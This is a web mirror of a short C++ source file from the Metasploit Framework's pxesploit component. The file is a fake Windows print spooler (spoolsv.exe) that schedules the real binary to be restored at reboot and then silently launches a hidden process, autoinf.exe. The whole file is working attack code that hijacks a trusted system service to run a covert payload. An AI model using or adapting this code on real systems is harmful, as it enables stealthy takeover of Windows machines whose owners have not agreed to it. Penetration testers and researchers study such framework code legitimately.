Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/pxesploit/spoolsv/spoolsv.cpp
28052 views
1
#include <Windows.h>

2
void start(){

3
	//Set up move back just in case

4
	MoveFileExA("C:\\Windows\\System32\\spoolsv.bak.exe","C:\\Windows\\System32\\spoolsv.exe",

5
		MOVEFILE_REPLACE_EXISTING|MOVEFILE_DELAY_UNTIL_REBOOT);

6


7
	//start replacement proc

8
	char windowsPath[MAX_PATH];

9
	GetWindowsDirectoryA(windowsPath,MAX_PATH);

10
	SetCurrentDirectoryA(windowsPath);

11
	STARTUPINFOA strt;

12
	PROCESS_INFORMATION proci;

13
	for(int i = 0; i < sizeof(strt); i++)

14
		((char*)&strt)[i]=0;

15
	for(int i = 0; i < sizeof(proci); i++)

16
		((char*)&proci)[i]=0;

17
	//one of these will work

18
	if(CreateProcessA("System32\\autoinf.exe",NULL,NULL,NULL,FALSE,CREATE_NO_WINDOW,NULL,NULL,&strt,&proci) == 0)

19
		CreateProcessA("SysWOW64\\autoinf.exe",NULL,NULL,NULL,FALSE,CREATE_NO_WINDOW,NULL,NULL,&strt,&proci);

20
}

21


22


23